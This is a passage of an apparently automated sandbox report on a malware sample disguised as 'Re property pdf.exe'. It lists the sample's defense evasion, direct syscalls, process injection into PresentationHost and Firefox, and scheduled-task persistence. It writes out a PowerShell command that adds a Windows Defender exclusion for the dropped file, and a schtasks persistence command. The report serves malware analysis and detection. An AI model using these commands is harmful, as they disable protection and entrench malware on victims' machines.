            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100EA80 mov eax, dword ptr fs:[00000030h]6_2_0100EA80
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100EA80 mov eax, dword ptr fs:[00000030h]6_2_0100EA80
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_0100EA80 mov eax, dword ptr fs:[00000030h]6_2_0100EA80
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_00FFCB7E mov eax, dword ptr fs:[00000030h]6_2_00FFCB7E
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_010D4A80 mov eax, dword ptr fs:[00000030h]6_2_010D4A80
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01038A90 mov edx, dword ptr fs:[00000030h]6_2_01038A90
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01008AA0 mov eax, dword ptr fs:[00000030h]6_2_01008AA0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01008AA0 mov eax, dword ptr fs:[00000030h]6_2_01008AA0
            Source: C:\Users\user\Desktop\Re property pdf.exeCode function: 6_2_01056AA4 mov eax, dword ptr fs:[00000030h]6_2_01056AA4
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtUnmapViewOfSection: Direct from: 0x76F02D3CJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\Re property pdf.exeMemory written: C:\Users\user\Desktop\Re property pdf.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: NULL target: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\PresentationHost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: NULL target: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: NULL target: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\PresentationHost.exeThread register set: target process: 5752Jump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB6.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeProcess created: C:\Users\user\Desktop\Re property pdf.exe "C:\Users\user\Desktop\Re property pdf.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hwOHPmqcegxcxb" /XML "C:\Users\user\AppData\Local\Temp\tmp600C.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess created: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exeProcess created: C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe "C:\Users\user\AppData\Roaming\hwOHPmqcegxcxb.exe"Jump to behavior
            Source: C:\Program Files (x86)\xmAeKWKVtSYxXAQkGmORQMFcsOElXurVobNODxlTs\uGMCFMVqKoR.exeProcess created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\PresentationHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: uGMCFMVqKoR.exe, 00000010.00000000.2097886787.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, uGMCFMVqKoR.exe, 00000010.00000002.4211839580.00000000010E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: uGMCFMVqKoR.exe, 00000010.00000000.2097886787.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, uGMCFMVqKoR.exe, 00000010.00000002.4211839580.00000000010E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: uGMCFMVqKoR.exe, 00000010.00000000.2097886787.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, uGMCFMVqKoR.exe, 00000010.00000002.4211839580.00000000010E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: uGMCFMVqKoR.exe, 00000010.00000000.2097886787.00000000010E1000.00000002.00000001.00040000.00000000.sdmp, uGMCFMVqKoR.exe, 00000010.00000002.4211839580.00000000010E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Users\user\Desktop\Re property pdf.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Re property pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
